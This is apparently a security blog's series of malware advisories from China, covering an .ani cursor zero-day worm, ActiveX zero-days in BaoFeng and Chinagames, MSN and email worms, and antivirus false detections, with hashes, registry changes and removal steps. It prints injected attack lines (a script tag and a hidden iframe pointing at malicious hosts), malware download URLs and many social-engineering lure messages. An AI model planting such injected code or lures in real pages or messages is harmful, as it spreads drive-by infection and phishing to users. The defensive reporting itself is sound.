It’s an alert for Windows users that malwares in China are using a new “Windows Animated Cursor Handling” zero-day vulnerability. This new worm behaves like

Worm.Win32.Fujacks.

It inserts harmful links containing “Windows Animated Cursor Handling” zero-day vulnerability in HTML, ASPX, PHP, HTM, JSP, ASP and Exe files and infects them. The worm also contains some Chinese spams.

Users should block the following domains where the said worm is present.

2007ip.com

Microfsot.com

The author has updated variants regarding this ani-worm vulnerability. This zero-day vulnerability is about 13K. MD5 hashes are the following:

99720c731d19512678d9594867024e7e
4ebca8337797302fc6003eb50dd6237d
e9100ce97a5b4fbd8857b25ffe2d7179

Kaspersky antivirus tool can identify it as “Trojan-Downloader.Win32.Agent.bky.”

Details About “.ani Zero-Day Vulnerability”

  1. When you execute it, following file is dropped:
%SYSTEM%\sysload3.exe

2. It adds the following entry into registry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
“System Boot Check”=”%SYSTEM%\sysload3.exe

3. Use Internet Explorer process to download the config file from the following link.

http://a.2007ip.com/<removed>.css

4. You will see the following content in this config file:

[config] Version=1.0.6
NUM=7
1=http://a.2007ip.com/<removed>/01.gif
2=http://a.2007ip.com/<removed>/02.gif
3=http://a.2007ip.com/<removed>/03.gif
4=http://a.2007ip.com/<removed>/04.gif
5=http://a.2007ip.com/<removed>/05.gif
6=http://a.2007ip.com/<removed>/06.gif
7=http://a.2007ip.com/<removed>/07.gif
hos=http://if.iloveck.com/<removed>/hos.gif
UpdateMe=http://a.2007ip.com/5949645<removed>.exe
tongji=http://if.iloveck.com/<removed>/tongji.htm

5. Beware of the following content via email.

From: i_love_cq@sohu.com
To: [random number]@qq.com
Subject:你和谁视频的时候被拍下的?给你笑死了!
Body:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
http://macr.microfsot.com/<removed>/134952.htm

6. The ani-worm also contains the following harmful URL:

http://macr.microfsot.com/<removed>/NOINDEX.HTM

7. The above page uses “.ani vulnerability” and two URLs in it are the following:

http://macr.microfsot.com/<removed>/1.jpg. http://macr.microfsot.com/<removed>/2.jpg

8. The above discussed two files are “.ani” files. These “ani-worm” files start downloading their copy from the following URL:

http://a.2007ip.com/cs<removed>.exe

9. This ani-worm infects “.HTML, .ASPX, .HTM, .PHP, .JSP, .ASP and .EXE files and adds a malicious link to “.HTML, .ASPX, .HTM, .JSP, .ASP files. The link contains “Windows Animated Cursor Handling zero-day vulnerability. Following is the malicious link:

<script src=http://macr.microfsot.com/<removed>.js></script>

10. The above-given link contains another harmful URL that’s as under:

http://macr.microfsot.com/Ad<removed>.jpg

11. It’s an intentionally-created “.ANI” file that starts downloading its copy from the following URL:

http://a.2007ip.com/5949645<removed>.exe

12. In the body of the worm, it seems like it hates Kaspersky. See the image below.

kaspersky aniworm status

ARP Attack to CISRT.org

With great apology to visitors: let us announce that sometimes they can view malicious codes while visiting our some pages. They may think that our site has been compromised. It’s not true. It’s maybe due to an ARP attack. We have informed the webserver provider regarding the issue. However, it’s still not confirmed whether it’s caused by ARP attack due to any other issue?

Users view the following malicious codes in some of our pages:

<iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>

The link above uses the vulnerability of

A file “SMS.exe” starts downloading from this URL. Size of the file is around 37,888 bytes.

Kaspersky identifies it as “Tronjan-Downloader.Win32.Baser.w.”

This malicious ARP can download 20 trojans from ganbibi.com.

We recommend users to block the following two domains:

Nmmmn.com

Ganbibi.com

Black Friday, Backdoor.Haxdoor

Black Friday has proved a dreadful day for the majority of Chinese users of Windows XP particularly users of Norton tools. We have received complaints from lots of users regarding a problem. They complained that Norton identifies two system files “netapi32.dll” and “Isasrv.dll” as a backdoor.Haxdoor.”

According to their observation, it happened when they upgraded their system to May.17,2007. Finally, the system deletes these two files and reboots. The OS loads into a blue screen and the system displays the following file protection message:

When you open the main Window, you can see the following message:

It’s also noted that not all windows OS are affected. It has affected only simplified Chinese Windows XP, SP2 OS. It’s because they have installed Microsoft Bulletins patch MS06-070, KB924270).

Currently, Symantec has taken an initiative and fixed this false detection by using LiveUpdate definitions (20070517, version 71).

This issue has affected the Chinese people greatly. According to the Rising statistics, more than 7,000 Windows users complained about it to the Rising.

We are hopeful that users will not encounter this kind of issues.

Three New 0-Day Exploits Used in Drive-By-Download Attack in China

This week, we detected three new 0-day Exploits used in a drive-by-download attack in China. These are BaoFeng (maps.dll & Config.dll), Remote Code Execution Exploit and Chinagames (CGAgent.dll)Remote Code Execution Exploit. These exploits are widely used.

BaoFeng (mps.dll) Remote Code Execution Exploit

When users install BaoFeng products, BaoFeng (mps.dll) Remote Code Execution Exploit works. By installing BaoFeng apps, the following ActiveX control is registered on their system:

Affected versions:
baofeng products<=[3.09.04.17]

CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB
Proble File:mps.dll
Proble Func:Sub OnBeforeVideoDownload(ByVal URL   As String)

BaoFeng (Config.dll) Remote Code Execution Exploit

When users install BaoFeng apps, they register an ActiveX control on their system that is given below:

Affected versions:
baofeng products<=[3.09.04.17]

CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
Proble File:Config.dll
Proble Func:Sub SetAttributeValue (
ByVal lpQueryStr   As String,
ByVal bstrAttributeName   As String ,
ByVal lpValueStr   As String
)

Chinagames(CGAgent.dll) Remote Code Execution Exploit

When users install Chinagames products, they register the below-given ActiveX control on the system:

Affected versions:
Chinagames 2009

CLSID:75108B29-202F-493C-86C5-1C182A485C4C
Proble File:CGAgent.dll
Proble Func:Sub CreateChinagames (ByVal lpszToken   As String)

So far, no patch is available to fix these 0-day exploits. In such a grim situation, you can take the following initiatives:

CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB
CLSID:75108B29-202F-493C-86C5-1C182A485C4C

Alternative:

You can also save the following registry to fix these exploitations.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}] “Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}] “Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{75108B29-202F-493C-86C5-1C182A485C4C}] “Compatibility Flags”=dword:00000400

BaoFeng is a renowned Media Player in China. According to the iUserTracker reports in March 2009, BaoFeng media player occupies 61.47% market share. BaoFeng has more users than Windows Media Players.

imageXX.zip, MSN worm variant

Today, we got another update regarding MSN worm variant. A new filename known as “imageXX.zip” came to the spotlight. (It appears in zip file such as the previous file “image41.zip”)

In the recent zip file, it includes a “.com” file known as “imageXX.JPG-www.photosmart.com.”

The screenshot of imageXX.zip sends “.zip” file to MSN contact list in the following way:

imageXX worm for MSN users

The filename is “imageXX.zip” and it contains “imageXX.JPG-www.photosmart.com.”

The size of the file is 60,928 bytes.

It contain the following MD5 hash: b18cc1ed9eac567af78e58f769b2e813

Kaspersky detects it as “Trojan-Downloader.Win32.Injecter.n.”

Details of imageXX.zip

  1. It drops zip files and a copy to the following folder in your system:
%System%\nvsvc64.exe
%temp%\XX.exe
%temp%\imageXX.zip (XX is random digitals, for example, “image41.zip”)

This worm variant adds the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
“nVidia Display Driver” = “nvsvc64.exe”

It sends out the following messages:

This picture isn’t you… right?
Wow i think i found your pic on myspace!
hah I think I found an old pic of us!
haha lets hope your parents dont see this picture of you 😀
hey did i ever show you this picture of me?
is it ok if I add this pic to my new slideshow?
can i up some of these pics of ya to my myspace profile?
you care if i put this pictuer of you in my new album?
sry about the messup i fixed the pic! Try it one more time pz
is this pic tooo sexy for photobucket??
wow I just dyed my hair… You will never believe the color it is now. lol And dont laugh
my crazy sister wants u to see these pics for some reason… take a look
OMFG!!!!!!!! 😀
wow! look at this old picture i found….
wanna see this pic of my Boobs?
Can i put this pic of you into my new myspace album?
Take a look at the new pics already! :p
I cant believe they wanted me to upload this picture to facebook lol. Its terrible. Like my outfit tho?
Lmfao hey im sending my new pictures! Check em out!
I’ve been editing some pics you should def see em loL! accept 🙂
Can you believe somone actually wears this size bra? I could use it for a Tent.
haha, this guy up my street just slammed his $90k car into a telephone pole! I got a pic of it with my cellphone
dude i just got these pictures off my digital for you! Gimme a moment to find em and send
Wanna see my pics before i send em to facebook?
do you think this picture is too kinky for Myspace?
OMG just accept please its only some pics!!
Hey accept my pictures, i got a bunch from when i was like a toddler :X
I think this picture is terrible. but my friends on myspace want to see it. please dont show noone.
Hey just finished new myspace album! 🙂 theres a few kinky ones in there!
OMG, i found ur pic on cuteornot.com! Check it out!!!
Have you seen me Naked Yet 😀
ok, I DO NOT like my new hair color.. but people on facebook do. what do you think? And no laughing! lol
hey you got a myspace album? anyways heres my new myspace album 🙂 accept k?
do I look dumb in this picture? I want to put it on myspace.
hey man accept my pics. 🙁 i just edited it to look maad funny..
Dude i found your picture on hotornot.com! Take a look!

How to Get Rid of It?

Step 1:

Go to the registry and delete the following registry entry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
“nVidia Display Driver” = “nvsvc64.exe”

Step 2:

Restart Windows

Step 3:

Delete the following files from system:

%System%\nvsvc64.exe
%temp%\imageXX.zip
%temp%\XX.exe

Kaspersky (China) Sues Rising

On May 19, we encountered a false detection case regarding Kaspersky antivirus tool.

On May 23, Rising’s announcement revealed that Kaspersky antivirus tool had mistakenly detected 22 files as virus and removed them from the system for six months. It also claimed that Kaspersky disappointed the Chinese users.

On July 5, Rising made another announcement that revealed some other false detections of Kaspersky in the last fifteen days.

For now, Kaspersky (China) published the following announcements:

On May 20, Kaspersky made false detections.

On May 22, Kaspersky falsely detected WinXP file known as shdocvw.dll.

On June 01, Kaspersky falsely detected Tecent QQ file.

On July 02, Kaspersky announced that they had sued Rising and their case is going to be held in Tianjin No.1 Intermediate People’s Court.

Microsoft Security Update Worm

Microsoft has issued a notification regarding a false Microsoft Security Update for June 2007.

In fact, a Trojan spam has disguised as Microsoft Security Update. The content of Trojan shows that it’s an update for Internet Explorer. But it’s a Trojan in fact.

Kaspersky identifies it as “Trojan-Downloader.Win32.Agent.avk.”

The spam details are as the following:

From: “MSIE Update” security14@microsoft.com

Subject: Microsoft Security Update

Body:

Microsoft Security Bulletin MS06-31

Cumulative Security Update for Internet Explorer (145677125)

Published: June 3, 2007

Version: 1.0

Summary

Who should read this document: Customers who use Microsoft Windows

Impact of Vulnerability: Remote Code Execution

Maximum Severity Rating: Critical

Recommendation: Customers should apply the update immediately.

Security Update Replacement: This bulletin replaces several prior security updates. See the frequently asked questions (FAQ) section of this bulletin for the complete list.

Internet Explorer for Microsoft Windows XP Service Pack 2 – Download the update

Revisions:

On June 3, 2007, Bulletin published and revealed the following details of this malicious trojan:

The following URL is a part of the Trojan:

http://amyberman.com/updatems06<removed>

The size of this malicious worm is 8,704 bytes.

It’s packaged with UPX 2.0. MD4 has the following hash:

1884cae661e902d3414b12adf38e4e2b

Summer2008.zip, IRC-Worm.Win32.Agent.a

Another new worm is circulating via MSN. The file is known as “summer2008.zip.” In the zip file, users can see a “.scr” file (summer2008.scr”).

This Trojan sends various messages in different languages. In the recent updates, this worm also includes Chinese language pronunciation. Kaspersky identifies it as “Backdoor.Win32.IRCBot.acd. Initially, it was known as “IRC-Worm.Win32.Agent.a)

This Trojan sends the following message to MSN users:

English Version:

Look how wasted Paris Hilton is, after she got jailed 🙁
You and Me !!! …. look :p
Look at my photos hihi :p
Hey please accept my photos 😮 !!
A photo with me and my best friend :$ !!
This is me totaly naked 😮 please dont send to anyone else
Look what i found on the NET 😮
Jessica Alba NUDE !!

Chinese Version:

kAN BA LI XI ER DUN JIN JIANYU HOU SHI DUO ME QIAOCUI 🙁
NI HE WO !!! …. QING KAN :p
KAN WO DE ZHAOPIAN :p
JIESHOU WO DE ZHAO PIAN 😮 !!
YI ZHANG WO GEN WO PENGYOU ZUI HAO DE ZHAOPIAN :$ !!
KAN WO DE ZHAOPIAN :p
ZHE SHI WO DE LUOZHAO 😮 QING BU YAO FA GEI BIEREN !!

Other Version:

bak sana Paris Hilton ne hale gelmis hapiste 🙁
Sen ve Ben !!! …. BAK :p
Baksana benim fotograflara hihi :p
Hey benim fotolarimi kabul et 😮 !!
Iyi arkadasimla fotorafdayim :$ !!
benim bu ciplak fotoda 😮 ama baskasina yollama
bak ne buldum 😮 Jessica alba ciplak !!

Regarde comment Paris Hilton parait efondr?apr qu’elle ai ?jeter en prison 🙁
Toi et moi !!! …. regarde :p
Regarde mes photos :p
Hey s’il te plait accepte mes photos 😮 !!
Une photo de moi et mon meilleur ami :$ !!
C’est moi totalement nu 😮
s’il te plait ne l’envoie a personne d’autre
Regarde ce que j’ai trouv?sur le net 😮 Jessica Alba NU !!

Kijk hoe erg Paris Hilton er aan toe is na gevangenschap 🙁
Jij en Ik !!!! …. kijk :p
Kijk eens naar mijn fotos hihi :p
HEY !! accepteer mn fotos dan !
met mijn beste vriend op de foto !! :$
Dit ben ik naakt op de foto, stuur alsjeblieft niet door.
Kijk wat ik gevonden heb 😮 Jessica Alba naakt !!

guck wie scheisse Paris Hilton aussieht, seitdem sie wieder aus dem knast ist 🙁
du und ich !!! ….guck :p
siehe meine fotos hihi :p
hey bitte nimm meine fotos an 😮 !!
ein foto mit meinem besten freund und mir :$ !!
das bin ich total nackt 😮 bitte sende es niemand anderem
guck was ich im internet gefunden habe 😮 jessica Alba NACKT !!

Guarda come Paris Hilton sprecato ? dopo che era imprijonata 🙁
Tu ed io !!! …. guarda :p
Guardi le mie foto hihi :p
Mairee photos accept karo 😮 !!
Una foto con me ed il mio amico migliore :$ !!
Questa e me totaly nudo 😮 prego non trasmette a chiunque
Osservi che cosa ho trovato sul internet 😮 Jessica alba NUDA !!

Veja como Paris Hilton est?acabada depois de ter sido presa 🙁
Voc?e eu !!!! …. Veja :p
Veja as minhas fotos hehehe :p
Por favor aceite as minhas fotos 😮 !!
Uma foto com o meu melhor amigo e eu :$ !!
Esta sou eu totalmente nua 😮 por favor nmande isso pra ningu
Olha o que eu achei na NET 😮 Jessica Alba NUA !!

Kolla hur fstd Paris Hilton, efter att hon fgslades 🙁
Du och jag !! …. Kolla 😉
Kolla p?min bilder, hihi :p
Hey, acceptera mina bilder, snla 😮
En bild p?mig och min bta v :$ !!!
Detta jag HELT naken.. 😮 Skicka inte till non annan, snla…
Kolla vad jag hittade p?net 😮 Jessica Alba NAKEN !!

Mira co Paris Hilton es perdida despu de ser encarcelada 🙁
Usted e yo !!! …. Mira :p
Mira mis fotos jejeje :p
Ha aceptado mis fotos por favor 😮 !!
Una foto con mi mejor amigo e yo :$ !!
Esta soy yo totalmente desnuda 😮
por favor no env para nadie Mira lo que encontr?en la WEB 😮 Jessica Alba DESNUDA !!

Lede hvor spild Paris Hilton er efter hun fik fgsel 🙁
Jer og Mig !!! … se :p
Se p?min fotos :p
Hej behage optage min foto 😮 !!
EN foto hos mig og min bedst ven :$ !!
denne er mig hele bar behage vage vendlig og sende den ikk til nogle 😮
Lede hvad jeg fandt oven p?den net 😮 Jessica Alba bar !!

When you execute the worm, it drops the following files in the “%WINDOWS% directory:

images0XX.zip
photos0XX.zip
albumXX.zip
photoXX.zip
pictures0XX.zip
pictureXX.zip (XX is random digitals, such as album39.zip, images091.zip)

The worm size is 120,832 bytes.

It is packed with NTKml and it has the following MD5 hash:

e1d1e9e2b1882f2c99c6a131341dea21.

How to Remove This Worm:

Step 1:

Go to the “Start” and type “Run”

Type “REGEDIT” in the Run and open the Registry Editor.

Step 2:

Open the following registry:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

In the right panel, delete “printers”=”{CLSID}”
(please copy the {CLSID} before deleting it)

Step 3:

Open HKEY_CLASSES_ROOT\CLSID

Delete the {CLSID} in the same way as you did in Step 2.

Step 4:

Reboot your system

Step 5:

Delete the following files from your system:

%System%\notiffy.dll
%System%\printers.exe
%userprofile%\new.txt
%Windows%\{string1}{random number}.zip (file size:119KB)

{string1} is one of the following:

images0
photos0
album
photo
pictures0
picture

For example:

Images047.zip contains a file like images047.scr

Photo92.zip contains a file like photo92.scr

Photo Album.zip Spreads via MSN

Some recent reports revealed that a worm “photo album.zip” is spreading via MSN messenger currently. We came to know that it is another variant of Backdoor.Win32.IRCBot.

If you receive the following message through MSN Messenger, don’t open the file.

HEY lol i’ve done a new photo album !:) Second ill find file and send you it.

Hey wanna see my new photo album?

Hey accept my photo album, Nice new pics of me and my friends and stuff and when i was young lol…

Hey just finished new photo album! 🙂 might be a few nudes 😉 lol…

hey you got a photo album? anyways heres my new photo album 🙂 accept k?

hey man accept my new photo album.. 🙁 made it for yah, been doing picture story of my life lol..

  1. The “.zip” file contains “photo album2007.pif.”

2. The size of the worm is 18,944 bytes.

3. It’s packed with UPX.

4. Kaspersky identifies it as “Backdoor.Win32.IRCBot.aaq.

5. While running in the MSN messenger, this IRCBot adds the following file in your system:

%windows%\photo album.zip

6. And adds a “.dll” file in Internet Explorer (explorer.exe)

%system%\rdshost.dll

7. It connects the following IRC channel:

darkjester.xplosionirc.net

Read the detailed report regarding this worm in Chinese by our analyst “Moonny.”

Another False Detection Case

Yesterday, a false detection case came to the spotlight from Symantec. Today, Kaspersky identified another false detection case.

Some Windows users in China complained that Kaspersky antivirus detects “rsaupd.exe” file in the system as “Trojan.Win32.Inject.av.

Remember that “rsaupd.exe”, developed by Rising AntiSpyware, updates the databases.

Rising AntiSpyware is a renowned anti-spyware tool in China. The majority of Chinese prefer it for the security of their systems. Lots of Kaspersky users who also use Rising AntiSpyware software encountered this issue.

However, Kaspersky has fixed this problem now. The false detection problem made Chinese users crazy for two days. Now, the situation is controlled.

G038_jpg.zip, IRCBot.aex

We received a variant of MSN worm yesterday from a Holland friend.

It’s known as “G038_jpg.zip.” The file contains a “.com” file with www.G038_jpg-msn.com.

Kaspersky has identified it as “Backdoor.Win32.IRCBot.aex.

The detailed information about this worm is as under:

The filename is G038_jpg.zip and it includes a “.com” file like www.G038_jpg-msn.com.

Its size is 435,200 bytes.

This worm has the following MD5 hash:

3ede1801994c59b35b96aac2b13852d1

Kaspersky detects it as “Backdoor.Win32.IRCBot.aex.

While executing, it drops the following files:

%Windows%\G038_jpg.zip
%Windows%\CDSpeed.exe

It adds the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
“CDSpeed.exe” = “%Windows%\CDSpeed.exe”

This worm modifies the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
“SFCDisable”=dword:ffffff9d
“SFCScan”=dword:00000000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
“WaitToKillServiceTimeout”=”7000”

This Trojan modifies various Registry entries, and some important system files like “FTP.exe, TFTP.exe, TCPIP.sys.

Users receive the following messages:

dessa egentligen trevliga: P
gyckel mte se dig detta fotografera
du fick se detta dess galet :p
estes s realmente agradeis 😛
wow voc?viu este?
como voc?gosta de me nesta foto
voc?comeu ver este seu assim engrado
Bu resimler nasil sence bir bakarmisin 🙂
su komik resimlerime baksana 😀
bak 😛
Kiz kardesim bunlari sana yollamami sledi 😉
bu resimler space in nasil
Space ime bun resimleri eklesem sence nasil olur
avete ottenuto vedere questo relativo cos?divertente
come lo pensate osservi qui sguardo di lol
a questo controllo di distorsione di velocit?questo fuori
el lol mi hermana quisiera que le enviara este bum de foto
vengo de fi este foto bum
ey i que hace el bum de foto!
Si vea el loL del em
l tipo, me acepta por favor su solamente bum de foto: (!
lol meine Schwester wscht mich Ihnen dieses Fotoalbum schicken
Geck, nehmen bitte sein nur mich Fotoalbum an: (!
he mhten mein neues Fotoalbum sehen?
hoe vind je dit er uit zien ?
hoe vind je dit ?
echt erg kijk dan
zo hee moet je dit zien echt niet normaal
zo moet je me hier op zien lol
lol he hoe vind je me hier op
eeeh c mes tof :p
c seulement mes tof de derniers vacances
tu dois voire les tof de notre bande
comment est-ce que je regarde sur cette photo ?
le lol ceci est dre
ma soeur a voulu que tu regarde ca
daut de la reproduction sonore avez-vous vu ceci ?
looooook :p
loooooooooooool 😀
lol he looks weird on this photo
omg check this out man this is funny
lol you got to see this 😛

How to Fix it

Step 1:

Delete the following registry entry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] “CDSpeed.exe”=”%Windows%\CDSpeed.exe”

Step 2:

Reboot Windows

Step 3:

Delete the following malicious files:

%Windows%\G038_jpg.zip
%Windows%\CDSpeed.exe

Step 4:

Copy the following files:

%System%\microsoft\backup.tftp to:

%System%\tftp.exe
%System%\dllcache\tftp.exe

copy %System%\microsoft\backup.ftp to:

%System%\ftp.exe
%System%\dllcache\ftp.exe

Step 5:

Set the following registry data:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
“SFCDisable”=dword:00000000

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
“WaitToKillServiceTimeout”=”20000”

Step 6:

Delete “SFCScan” from registry data:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
“SFCScan”

MSN Worm outbreak

Lots of MSN users in China are facing a new worm known as “photos.zip.” It’s spreading widely among users of Internet Explorer.

This worm sends messages in Spanish, English, Chinese, French and in other languages. The message contains text like “My friend took nice photos of me. you Should see em loL!”

“Hey regarde les tof, c’est moi et mes copains entrain de…. :D”, etc.

We have announced an alert to Chinese users at 5:30 PM, June 1, 2007 to make them careful regarding this worm.

It is in the form of a zip file that contains “photos album_2007_5_26.scr.”

Its size is 479,232 bytes.

This worm has the following MD5 hash:

9784ab71076f583ce02de0340554aefa

When you execute the file, it leaves a file in Registry and changes the following registry key:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
“syshosts” = “{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}”

It uses multiple languages to send the following messages:

English version:

Here are my private pictures for you
Here are my pictures from my vacation
My friend took nice photos of me.you Should see em loL!
its only my photos!
Nice new photos of me and my friends and stuff and when i was young lol…
Nice new photos of me!! :p
Check out my sexy boobs 😀

French version:

hey regarde mes tof!! :p
ma soeur a voulu que tu regarde ca!
hey regarde les tof, c’est moi et mes copains entrain de…. 😀
j’ai fais pour toi ce photo album tu dois le voire 🙂
tu dois voire ces tof
mes photos chaudes 😀
c’est seulement mes tof :p

Netherlands or Belgium version:

zijn enige mijn foto’s
wanna Hey ziet mijn nieuw fotoalbum?
Hey beindigde enkel nieuw fotoalbum! 🙂
hey keurt mijn nieuw fotoalbum goed.. :p
het voor yah, doend beeldverhaal van mijn leven lol..

Italian version:

le mie foto calde :p

Germany version:

meine hei en Fotos ! :p

Spanish version:

mis fotos calientes
mi fotografas :p
Mi amigo tom las fotos agradables de m
el lol mi hermana quisiera que le enviara este album de foto

Read the detailed report by our analyst Moonny about this worm.

More Zhelatin.eu spams

Today, we received some updates regarding a new variant of “Email-Worm.Win32.Zhelatin.”

These spam bodies contain multiple “.hk” domains links.

For the time being, we have received different 26 “.hk” domains. Currently, most of them are active.

In the subject of these spams you can see the following words:

Gday, Good day!, Hello, Hey, Hi, Miracle of Love, etc.

The emails contain multiple links. When users click a link, it opens a malicious site.

The page starts downloading different vulnerabilities like “MS05-052, MS06-014, MS06-072, MS07-017” and some “.exe” files. These “.exe” files are variants of “Email-Worm.Win32.Zhelatin.”

Kaspersky antivirus identifies it as “Email-Worm.Win32.Zhelatin.eu.”

Users of Internet Explorer are facing lots of spams. That’s why; we decided to announce this alert for users.

These spams work in the following ways:

Subject:

For You….My Love
Gday
Gday, Bud
Gday, Pal
Good day!
Hello
Hello, Bud
Hey
Hey, Bud
Hey, Pal
Hi
Hi, Bud
Hi, Pal
Memories of You
Miracle of Love
Path We Share
Re:

Body:

The body contains the following message:

A Toast My Love
http://<blocked>.hk/

If an efficient algorithm can be found for obtaining p and q for any
given n, the system will fall apart.

check it
http://<blocked>.hk/

check this
http://<blocked>.hk/

Dream of You
http://<blocked>.hk/

And it struck me that what I saw in Legoland were nothing but sculptures.

just for you
http://<blocked>.hk/
—-
just look
http://<blocked>.hk/

look
http://<blocked>.hk/

look it
http://<blocked>.hk/

look this
http://<blocked>.com/

lol
http://<blocked>.hk/

read
http://<blocked>.hk/

read it
http://<blocked>.hk/

read this
http://<blocked>.hk/

this is for you
http://<blocked>.hk/

You’re In My Thoughts
http://<blocked>.hk/

In all cases, your site needs to look good, and in all cases, your site
needs to function properly.

You’re the One
http://<blocked>.hk/

When you open the above links, users visit a “.index.html page. There are the following codes on this page:

CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F

It’s, in fact, MS05-052 vulnerability.

In the next part on this page, you will see four “.htm” files like exp1.htm, exp2.htm, exp3.htm and 123.htm.

The “exp1.htm” includes MS06-014,

“exp2.htm” includes MS06-014 and MS06-072,

Exp3.htm contains Microsoft Internet Explorer WebViewFolderIcon vulnerability.

In the lowest part, a file “fun.exe” starts downloading from the following link:

http://z<blocked>y.hk/fun.exe

The file size is 8,021 bytes.

It has the following MD5 hash:

b2fa5d9287cdc2a4e96fb2dcab99021a

 

LEAVE A REPLY

Please enter your comment!
Please enter your name here